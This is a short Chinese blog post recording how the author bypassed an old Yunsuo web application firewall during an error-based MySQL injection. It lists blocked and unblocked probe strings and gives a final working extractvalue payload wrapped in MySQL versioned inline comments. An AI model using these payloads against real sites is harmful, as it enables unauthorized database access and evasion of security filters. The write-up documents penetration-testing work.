老版本云锁bypass小记

起因

最近有空的时候会挖挖漏洞，今天注入的时候遇到了老版本的云锁，简单记录bypass过程

漏洞点

因为漏洞点是一个报错注入，使用?id=extractvalue()函数就会被拦截，如图：

使用?id=extractvalue不被拦截

使用内联注释分离函数和括号

关于内联注释

/* */在mysql中是多行注释，但是如果在中间添加了!，那么!后面的内容会被执行，如图：

bypass

构造 ?id=extractvalue/*!()*/被拦截

构造?id=extractvalue/*!1()*/不拦截

构造?id=/*!40000/*!30000extractvalue*/()不拦截

最终payload为：

?id=extractvalue/*!40000(1,concat(char(126),md5(1654670033)))*/

成功注入

参考链接

• https://www.cnblogs.com/Pomelo21/p/12558406.html
• https://xz.aliyun.com/t/7641

__EOF__

本文作者：春告鳥
本文链接：https://www.cnblogs.com/Cl0ud/p/14341616.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！